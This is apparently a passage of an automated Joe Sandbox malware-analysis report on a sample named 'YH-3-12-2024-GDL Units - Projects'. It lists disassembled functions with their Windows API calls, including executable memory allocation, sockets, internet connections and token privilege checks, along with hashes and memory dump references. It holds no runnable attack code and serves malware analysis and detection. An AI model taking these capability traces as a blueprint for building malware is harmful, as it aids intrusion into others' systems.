                                                        • Instruction ID: 34992b6e81b15c286757bc2b5923cc72ac7194393d550ee90e520778ef59e93c
                                                        • Opcode Fuzzy Hash: 6ae90cd15117b204c5b69a17939e75c21d2bb03bcc187fc037dfb803df1be320
                                                        • Instruction Fuzzy Hash: 35C13E75A0421AEFCB14CF94C884EAEBBB9FF48714B15859CE816EB251D730DD81DB90
                                                        Function 0083E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CharLowerBuffW.USER32(?,?), ref: 0083E0BE
                                                        • CharLowerBuffW.USER32(?,?), ref: 0083E101
                                                          • Part of subcall function 0083D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0083D7C5
                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0083E301
                                                        • _memmove.LIBCMT ref: 0083E314
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                        • String ID:
                                                        • API String ID: 3659485706-0
                                                        • Opcode ID: 606de15cba7cd84102eac2c161a55fd36fa99a3056f36f54c9f00a0e919b9a42
                                                        • Instruction ID: ccd3fa28d55d8d08991cdac057bf2e7e13fa7ca65c23608eee315b027fdfb1a9
                                                        • Opcode Fuzzy Hash: 606de15cba7cd84102eac2c161a55fd36fa99a3056f36f54c9f00a0e919b9a42
                                                        • Instruction Fuzzy Hash: DFC13171A083018FC714DF28C484A6ABBE4FF89714F14896EF899DB391D775E946CB82
                                                        Function 00838093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 008380C3
                                                        • CoUninitialize.OLE32 ref: 008380CE
                                                          • Part of subcall function 0081D56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0081D5D4
                                                        • VariantInit.OLEAUT32(?), ref: 008380D9
                                                        • VariantClear.OLEAUT32(?), ref: 008383AA
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                        • String ID:
                                                        • API String ID: 780911581-0
                                                        • Opcode ID: 3afffcf66ac64a8a113e61c4c60ff5c634ab6750975cd73a0be423b6abaf5fd2
                                                        • Instruction ID: 07498934cb10e5fef0e9e58e7a2be9b52a0b0fad6122e5cce65c82572bcd211f
                                                        • Opcode Fuzzy Hash: 3afffcf66ac64a8a113e61c4c60ff5c634ab6750975cd73a0be423b6abaf5fd2
                                                        • Instruction Fuzzy Hash: 55A1FF75604701DFCB40DF24C889A2AB7E4BB89714F14445CFA9A9B3A2CB34E945CB82
                                                        Function 00817530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00852C7C,?), ref: 008176EA
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00852C7C,?), ref: 00817702
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0084FB80,000000FF,?,00000000,00000800,00000000,?,00852C7C,?), ref: 00817727
                                                        • _memcmp.LIBCMT ref: 00817748
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 051cdb16f4d6ac156e44b27251502acf242c090a3a6968c43f0d4023f20406e0
                                                        • Instruction ID: e0aec15170d313168400410473dc661b784ccd6ec37b2a0e96262de76612f25f
                                                        • Opcode Fuzzy Hash: 051cdb16f4d6ac156e44b27251502acf242c090a3a6968c43f0d4023f20406e0
                                                        • Instruction Fuzzy Hash: 38810B75A00109EFCB04DFA4C988EEEB7B9FF89315F204558E506EB250DB71AE46CB60
                                                        Function 0081687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: dd0826aee0bf12b2ecec12eb9681e9b6e6acf5b6bd2372f8193e48ddb7890cf1
                                                        • Instruction ID: 0c171562783d0b7d284e11ef2f70fb45c6af1499a349786accd0f1dd73fba28e
                                                        • Opcode Fuzzy Hash: dd0826aee0bf12b2ecec12eb9681e9b6e6acf5b6bd2372f8193e48ddb7890cf1
                                                        • Instruction Fuzzy Hash: 6E51AF747003069ACB24AF69D895ABAB7EDFF45310F20D81FE5C6DB291EA74D8E08701
                                                        Function 00819A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00819AD2
                                                        • __itow.LIBCMT ref: 00819B03
                                                          • Part of subcall function 00819D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00819DBE
                                                        • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00819B6C
                                                        • __itow.LIBCMT ref: 00819BC3
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: 2d4db00ff199ea24b5a10b3bbfcea385ab4312b7c13ab4cfa7329369463fc29c
                                                        • Instruction ID: c45342c763452c855032e2e790e2143c22b77a308d3ede6d52424a979f6a5ecd
                                                        • Opcode Fuzzy Hash: 2d4db00ff199ea24b5a10b3bbfcea385ab4312b7c13ab4cfa7329369463fc29c
                                                        • Instruction Fuzzy Hash: CA41AF70A04219ABDF25EF54D859FEE7BB9EF48720F00006DF949A3291DB749A84CB61
                                                        Function 008369AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 008369D1
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 008369E1
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00836A45
                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00836A51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$__itow__swprintfsocket
                                                        • String ID:
                                                        • API String ID: 2214342067-0
                                                        • Opcode ID: 70be03f3c3e8c82310063ae1f7a92e6535f42b13d636aadab2cf4065632ffc1b
                                                        • Instruction ID: 3b9630a646b3507415c7d9a1c2ca36d5d10c4d84edb117d5c262a800b1b8a749
                                                        • Opcode Fuzzy Hash: 70be03f3c3e8c82310063ae1f7a92e6535f42b13d636aadab2cf4065632ffc1b
                                                        • Instruction Fuzzy Hash: 5E415175740210AFEB90AF28CC8AF6A77E4EF45B14F04C45CFA599F2D2DA789D008791
                                                        Function 0083641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,0084F910), ref: 008364A7
                                                        • _strlen.LIBCMT ref: 008364D9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _strlen
                                                        • String ID:
                                                        • API String ID: 4218353326-0
                                                        • Opcode ID: 94daa139f90f5f4dbd93ea3c4996def6b808194e71ba515e2243d57a930b43d3
                                                        • Instruction ID: eb017b340555365abd6d44297034504d41519731394906e5e8a6a7a8254be064
                                                        • Opcode Fuzzy Hash: 94daa139f90f5f4dbd93ea3c4996def6b808194e71ba515e2243d57a930b43d3
                                                        • Instruction Fuzzy Hash: 2E416071600108ABCB14EBA8DC99FAEB7A9FF44310F14816DF91AD7292EB34AD50C791
                                                        Function 0082B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0082B89E
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0082B8C4
                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0082B8E9
                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0082B915
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                        • String ID:
                                                        • API String ID: 3321077145-0
                                                        • Opcode ID: a77f911e7bcab26aeeeddabb712bd56dc6ec5a22f6088513c16960bb36d7d65f
                                                        • Instruction ID: ba1b3f646cd29ffe568c1b1d91f3ddb2d7074ea7095ba058dabc4167dc4ee674
                                                        • Opcode Fuzzy Hash: a77f911e7bcab26aeeeddabb712bd56dc6ec5a22f6088513c16960bb36d7d65f
                                                        • Instruction Fuzzy Hash: D341F439A00620DFCB51EF15C588A59BBE1FF4A710F09809CEE4A9B362CB34ED41CB91
                                                        Function 007F61C5 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        APIs
                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 007F61FB
                                                        • __isleadbyte_l.LIBCMT ref: 007F6229
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007F6257
                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 007F628D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                        • String ID:
                                                        • API String ID: 3058430110-0
                                                        • Opcode ID: 21a816f0bde99cedcc5beb17c1fbd513b7f3d11dd5a75faeb0fa9c8f10e8bae5
                                                        • Instruction ID: fca053f37f464e7f4e66c8e2b901ad903ade332cc93e022eb6e837d0c4e00d18
                                                        • Opcode Fuzzy Hash: 21a816f0bde99cedcc5beb17c1fbd513b7f3d11dd5a75faeb0fa9c8f10e8bae5
                                                        • Instruction Fuzzy Hash: BA31CF3060024EEFDF218F65CC48BBA7BB9FF42320F154028EA24972A1E735E950DB90
                                                        Function 00844EEE Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetForegroundWindow.USER32 ref: 00844F02
                                                          • Part of subcall function 00823641: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0082365B
                                                          • Part of subcall function 00823641: GetCurrentThreadId.KERNEL32 ref: 00823662
                                                          • Part of subcall function 00823641: AttachThreadInput.USER32(00000000,?,00825005), ref: 00823669
                                                        • GetCaretPos.USER32(?), ref: 00844F13
                                                        • ClientToScreen.USER32(00000000,?), ref: 00844F4E
                                                        • GetForegroundWindow.USER32 ref: 00844F54
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                        • String ID:
                                                        • API String ID: 2759813231-0
                                                        • Opcode ID: f10fea6f5d01887657b7e8e1afac67a0eac5dd34ec8bee3e05e77005a6d4027a
                                                        • Instruction ID: 1a27c3a5bcb414ff3e7f059bdda58c2398a8426a3014d2bb89de1c29169722a7
                                                        • Opcode Fuzzy Hash: f10fea6f5d01887657b7e8e1afac67a0eac5dd34ec8bee3e05e77005a6d4027a
                                                        • Instruction Fuzzy Hash: A6311A71D00208AFDB00EFA9C885EEFB7F9EF99300B10406AE515E7201EA759E45CBA1
                                                        Function 00818656 Relevance: 6.1, APIs: 4, Instructions: 79memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0081810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00818121
                                                          • Part of subcall function 0081810A: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0081812B
                                                          • Part of subcall function 0081810A: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0081813A
                                                          • Part of subcall function 0081810A: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00818141
                                                          • Part of subcall function 0081810A: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00818157
                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 008186A3
                                                        • _memcmp.LIBCMT ref: 008186C6
                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 008186FC
                                                        • HeapFree.KERNEL32(00000000), ref: 00818703
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                        • String ID:
                                                        • API String ID: 1592001646-0
                                                        • Opcode ID: 307289fadd98cc4f76bfe76a59663daa300eafdbbd53e05e356d85f8050342cb
                                                        • Instruction ID: efa7b26900d10d9aa3b3c661942426f8fd445fb1a8acee00988eaee1ddf28411
                                                        • Opcode Fuzzy Hash: 307289fadd98cc4f76bfe76a59663daa300eafdbbd53e05e356d85f8050342cb
                                                        • Instruction Fuzzy Hash: 06216972E00108EFDB10DFA8C95ABEEB7B8FF55304F154059E444AB241DB31AE45CB90
                                                        Function 007E098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • __setmode.LIBCMT ref: 007E09AE
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00827896,?,?,00000000), ref: 007C5A2C
                                                          • Part of subcall function 007C5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00827896,?,?,00000000,?,?), ref: 007C5A50
                                                        • _fprintf.LIBCMT ref: 007E09E5
                                                        • OutputDebugStringW.KERNEL32(?), ref: 00815DBB
                                                          • Part of subcall function 007E4AAA: _flsall.LIBCMT ref: 007E4AC3
                                                        • __setmode.LIBCMT ref: 007E0A1A
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                        • String ID:
                                                        • API String ID: 521402451-0
                                                        • Opcode ID: 8c0d7bfb670d6bc5725ca652f51f42e39d77863a8109fa723ad13aa3b4cd193a
                                                        • Instruction ID: e8b892c569b66eea7026c4f4e4334bc4e275045c58a399d75a136c159e588d17
                                                        • Opcode Fuzzy Hash: 8c0d7bfb670d6bc5725ca652f51f42e39d77863a8109fa723ad13aa3b4cd193a
                                                        • Instruction Fuzzy Hash: F1115731505288EFCB04B6B6AC4EDBE77A8EF89320F10406DF20497182EE79589283E5
                                                        Function 00831767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008317A3
                                                          • Part of subcall function 0083182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0083184C
                                                          • Part of subcall function 0083182D: InternetCloseHandle.WININET(00000000), ref: 008318E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseConnectHandleOpen
                                                        • String ID:
                                                        • API String ID: 1463438336-0
                                                        • Opcode ID: 31f9ce1e20f97a71e9097810a03d4507883c9eb26f414c7680b61203fb0e6560
                                                        • Instruction ID: cc30da70012b8a0c540f2c47c2505ac0ad27727a9774181a052da752acde34c2
                                                        • Opcode Fuzzy Hash: 31f9ce1e20f97a71e9097810a03d4507883c9eb26f414c7680b61203fb0e6560
                                                        • Instruction Fuzzy Hash: AC21CD36200605BFEF129F64CC05FBABBA9FF89B11F14402EFA05D6651DB719811ABE4
                                                        Function 00823A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,0084FAC0), ref: 00823A64
                                                        • GetLastError.KERNEL32 ref: 00823A73
                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00823A82
                                                        • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0084FAC0), ref: 00823ADF
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CreateDirectory$AttributesErrorFileLast
                                                        • String ID:
                                                        • API String ID: 2267087916-0
                                                        • Opcode ID: 0cbef4e0887bcadccd2eb6fdce539a38ef10b8f6d385e998e2e3045bdd9a4024
                                                        • Instruction ID: 961e7c53a5138009b9bb1865dc2f75d8924200c6997c01c3142e1407fac37aba
                                                        • Opcode Fuzzy Hash: 0cbef4e0887bcadccd2eb6fdce539a38ef10b8f6d385e998e2e3045bdd9a4024
                                                        • Instruction Fuzzy Hash: 2721D634108625CF8300DF28D89596B77E4FE55368F104A2DF49AC72E2DB35DE86CB42
                                                        Function 0081DCBE Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 0081F0BC: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,0081DCD3,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?), ref: 0081F0CB
                                                          • Part of subcall function 0081F0BC: lstrcpyW.KERNEL32(00000000,?,?,0081DCD3,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081F0F1
                                                          • Part of subcall function 0081F0BC: lstrcmpiW.KERNEL32(00000000,?,0081DCD3,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?), ref: 0081F122
                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081DCEC
                                                        • lstrcpyW.KERNEL32(00000000,?,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081DD12
                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,0081EAC6,00000000,000000EF,00000119,?,?,00000000), ref: 0081DD46
                                                        Strings
                                                        Memory Dump Source
